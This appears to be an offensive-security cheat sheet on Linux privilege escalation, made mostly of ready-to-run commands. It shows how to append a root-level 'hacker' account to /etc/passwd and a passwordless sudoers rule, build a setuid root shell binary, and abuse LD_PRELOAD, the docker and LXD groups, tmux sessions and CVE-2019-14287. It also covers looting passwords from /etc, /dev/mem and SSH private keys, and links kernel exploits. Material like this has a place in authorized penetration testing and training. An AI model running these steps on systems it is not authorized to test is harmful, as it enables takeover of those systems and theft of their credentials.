Privilege escalation - Linux

Privilege escalation is a critical step in the post-exploitation phase, where attackers elevate their access to a higher privilege level. This guide will focus on practical techniques and commands to identify and exploit various privilege escalation vulnerabilities in Linux. It includes tools, methods for finding sensitive information, exploiting misconfigurations, and utilizing kernel vulnerabilities. Every method will have corresponding commands to enhance its practicality.

Tools

These tools are essential for finding and exploiting privilege escalation vulnerabilities:

• LinPEAS: Privilege Escalation auditing script.

  Copy

  wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
  chmod +x linpeas.sh
  ./linpeas.sh

• Linux Exploit Suggester: Suggests potential exploits based on system vulnerabilities.

  Copy

  wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
  chmod +x linux-exploit-suggester.sh
  ./linux-exploit-suggester.sh

• Pspy: Monitors processes without root access.

  Copy

  wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
  chmod +x pspy64
  ./pspy64

Checklist

System information:

• Gather system information:

  Copy

  uname -a
  cat /etc/*release
  id

• Check running processes:

  Copy

  ps aux

• Check kernel version: Kernel Exploits

  Copy

  uname -r

• List users on the system:

  Copy

  cat /etc/passwd

• Check available shell history:

  Copy

  cat ~/.bash_history

PATH Variable & Writable Folders

• Check if any folder in the PATH is writable:

  Copy

  echo $PATH
  ls -ld $(echo $PATH | tr ":" "\n") | grep "w"

Environment Variables

• Check environment variables for sensitive information:

  Copy

  env

Kernel Exploits

• Search for kernel exploits using scripts (e.g., DirtyCow):

  Copy

  ./linux-exploit-suggester.sh

• Check for specific kernel exploits like DirtyCow:

  Copy

  https://github.com/dirtycow/dirtycow.github.io

• Check if the sudo version is vulnerable:

  Copy

  sudo -V

Dmesg: Signature Verification Failed

Look for kernel errors or issues related to signature verification:

dmesg | grep -i signature

More System Enumeration

Check System Information (Date, System Stats, CPU Info)

• Date and Time: (Helps you synchronize your actions with scheduled jobs or detect potential time-based misconfigurations)

  Copy

  date

• CPU info: (Identifies the system architecture to tailor exploits to the specific processor type)

  Copy

  cat /proc/cpuinfo

• Check for printers: (Identifies networked printers, which could be exploited for lateral movement or sensitive data interception)

  Copy

  lpstat -p

• Check for writable files:

  Copy

  find / -writable -type f 2>/dev/null

Looting for Passwords

Files Containing Passwords

Common files where passwords are stored:

grep -r "password" /etc/* 2>/dev/null
grep -r "PASSWORD" /etc/* 2>/dev/null

Old Passwords in /etc/security/opasswd

cat /etc/security/opasswd

Last Edited Files

find / -type f -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort -r | head

In-Memory Passwords

Dump memory to search for passwords:

strings /dev/mem | grep -i password

Find Sensitive Files

SSH Key

Search for SSH keys on the system:

find / -name "id_rsa" 2>/dev/null

Scheduled Tasks

Cron Jobs

Check cron jobs:

bashCopy codecat /etc/crontab
ls -la /etc/cron.*
ls -la /var/spool/cron/crontabs

If you find a writable cron job, you can inject your own commands.

Systemd Timers

List systemd timers that could be manipulated:

systemctl list-timers

SUID

Find SUID Binaries (https://gtfobins.github.io/)

SUID binaries run with elevated privileges:

find / -perm -4000 -type f 2>/dev/null

Create a SUID Binary

If you can create a SUID binary, you can escalate privileges:

cCopy code#include <stdio.h>
#include <unistd.h>

int main() {
    setuid(0);
    system("/bin/bash");
    return 0;
}

Compile and set SUID:

gcc -o suid_binary suid_binary.c
chmod +s suid_binary

Capabilities

List Capabilities of Binaries

Linux capabilities allow binaries to perform privileged operations:

getcap -r / 2>/dev/null

Edit Capabilities

If you find writable binaries with capabilities:

tcap cap_setuid+ep /path/to/binary

Interesting Capabilities

Look for binaries with capabilities like cap_setuid, cap_dac_override, or cap_sys_admin that can help escalate privileges.

SUDO

NOPASSWD

Look for sudo privileges without requiring a password:

sudo -l

LD_PRELOAD and NOPASSWD

Use LD_PRELOAD to exploit vulnerable binaries:

bashCopy codeecho 'int getuid() {return 0;}' > preload.c
gcc -shared -o preload.so preload.c -fPIC
sudo LD_PRELOAD=./preload.so /path/to/command

Doas

Doas is an alternative to sudo. Check if it's configured:

doas -s

Writable Files

Writable /etc/passwd

If /etc/passwd is writable, you can modify it to create a new user:

echo 'hacker:x:0:0:hacker:/root:/bin/bash' >> /etc/passwd

Writable /etc/sudoers

If writable, add a new sudo rule:

echo 'hacker ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers

NFS Root Squashing

If root squashing is disabled, mount the NFS share and escalate privileges:

mount -o rw,vers=3 nfs_server:/share /mnt

Shared Library Exploits

ldconfig

Check for writable paths in ldconfig:

ldconfig -p

RPATH

RPATH allows binaries to specify search paths for libraries. If vulnerable, this can be exploited by injecting malicious libraries.

Docker and LXC/LXD

Docker

If the user is part of the docker group, they can escalate privileges:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

LXC/LXD

Exploit LXD by importing an image:

lxc image import ./rootfs.tar.xz --alias privesc
lxc init privesc privesc-container -c security.privileged=true
lxc start privesc-container
lxc exec privesc-container /bin/sh

Hijack TMUX Session

If a TMUX session is running as root, hijack it:

tmux ls
tmux attach -t <session-id>

Kernel Exploits

CVE-2022-0847 (DirtyPipe)

Exploit DirtyPipe for privilege escalation:

https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

CVE-2016-5195 (DirtyCow)

Exploit DirtyCow for privilege escalation:

https://github.com/dirtycow/dirtycow.github.io

CVE-2010-3904 (RDS)

RDS socket vulnerability:

https://www.exploit-db.com/exploits/15285

CVE-2010-4258 (Full Nelson)

Full Nelson exploit for privilege escalation:

https://www.exploit-db.com/exploits/15704

CVE-2019-14287

This exploit allows for privilege escalation if a misconfigured sudo is in place:

sudo -u#-1 /bin/bash

CVE-2012-0056 (Mempodipper)

Mempodipper is a kernel exploit for privilege escalation:

https://www.exploit-db.com/exploits/18411